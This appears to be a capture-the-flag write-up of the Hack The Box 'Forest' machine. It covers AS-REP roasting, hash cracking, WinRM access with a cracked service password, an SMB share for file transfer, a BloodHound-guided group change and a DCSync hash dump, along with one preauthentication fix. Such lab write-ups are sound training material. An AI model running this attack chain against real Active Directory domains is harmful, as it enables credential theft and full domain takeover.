Hack The Box Forest

System IP: 10.129.1.77 (Forest)

Service Enumeration

Server IP Address

Ports Open

10.29.1.77

TCP: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985

UDP:

Nmap Scan Results:

Service Scan

sudo nmap -sS -sC -sV -O 10.129.1.77

Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269

Scanning all ports: sudo nmap -p- -v 10.129.1.77

Initial Shell Vulnerability Exploited

AS-REP Roasting Identify Accounts that Do Not Require preauthentication.

Additional info about where the initial shell was acquired from

Vulnerability Explanation: No domain account is needed to perform this attack, only connection to the KDC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. The script GetNPUsers.py can be used from a Linux machine in order to harvest the non-preauth AS_REP responses. After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.

Vulnerability Fix:

Severity: Critical

Proof of Concept Code Here:

https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py

Privilege Escalation

Hack the Box Forest

Service Scan

sudo nmap -sS -sC -sV -O 10.129.1.77

Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269

Scanning all ports: sudo nmap -p- -v 10.129.1.77

After seeing SMB and LDAP I tried using crackmap to enumerate more about the server

Domain name: htb.local

SMB Version 1

sudo nmap -sT -Pn -n –open 10.129.1.77 –script ldap-rootdse

https://exploit.ph/active-directory-recon-1.html

I then used Metasploit aux scanner to enumerate users from the Active Directory Server.

I could potentially use these usernames to conduct a brute-force

sudo enum4linux -a 10.129.1.77

New Trick (Most Likely not allowed on test) crackmapexec allows for password policy enumeration through “null” authentication. Very interesting.

After more googling I came across “impacket” which is on my Kali box. I found that some of the scripts would allow you to dump user hashes. I change my /etc/hosts file to reflect 10.129.1.77 htb.local

I used GetNPUsers.py script against the htb.local domain for svc-alfresco first.

The hash was for KRB-asrep-23. The article below lead me to using -m 18200 to crack the hash

https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/

Vulnerability Fix: Protections from AS-REP Roasting Identify Accounts that Do Not Require preauthentication. To prevent this attack find and remove any instances of user accounts that are set to not require Kerberos preauthentication. You can do that with a simple script:

Powershell Command

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Reference: https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/

Looking over the full nmap scan I see wsman (WINRM 5985) is open. I pulled down evil-winrm and used the svc-alfresco account with the cracked has (s3rvice) to winrm into the machine.

Once on the box I needed to create a way to transfer files onto the DC. This is where I learned a new trick using impacket.

Sudo impacket-smbserver LetsGo $(pwd) -smb2support -user hunter -password password

$pass = convertto-securestring ‘password’ -AsPlainText -Force

$cred = New-Object System.Managment.Automation.PSCredential(‘hunter’, $pass)

New-PSDrive -Name hunter -PSProvider FileSystem -Credential $cred -Root \\10.10.14.113\LetsGo

Once a new drive was connected to the DC I tried using winPEAS.exe to enumerate more but no other info was of any importance

After lots of googling I decided to use Bloodhound. I have used it plenty of times so this part was easy to setup on Kali. You need Sharphound.exe for collecting domain info from service account “Alfresco”. Since I am authenticated to the DC I can transfer sharphound.exe over and run it with a collection all flag. For the setup you will use collectors, BloodHound (Visualizer), and Neo4j for the database backbone.

Essentially, we need to get admin privileges. I can see that Alfresco is a member of Privilege account group which is a member of Account Operators that has Generic all membership to Exchange Windows Permissions. Now I know I can create users and add those users to the exchange group via the relationship breakdown visualized by Bloodhound.

After adding user, I googled how to add users to other groups. I added my new user “hunter” to the “Exchange Windows Permissions” group

Ran bloodhound again to see that hunter was added

You can see that hunter is a part of the Exchange group. Very noisy

Bloodhound also highlights abuse info from Exchange IOT to execute DcSync.

DcSync Exploit:

OpSec Consideration for mitigating threat

After downloading PowersSploit I copied Powerview to my smb directory where I am currently hosting impacket-smbserver out of.

Once you use evil-winrm another session to the DC you can reconnect back to your kali box and user the hunter: drive

Next, serve a python3 -m http.server 80 to download PowerView.ps1

The follow on task were compiled from the Git Book link below along with BloodHound references

https://burmat.gitbook.io/security/hacking/domain-exploitation

Execute the below command to transfer the PowerView.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Now we want to set our variables for hunters’ password. This will help us use the exploit command for DcSync referred by BloodHound

Secrets.py Performs various techniques to dump hashes from the remote machine without executing any agent there.

https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

Now we have Admin hash

PreviousExploiting Active DirectoryNextHack The Box Academy

Last updated

Was this helpful?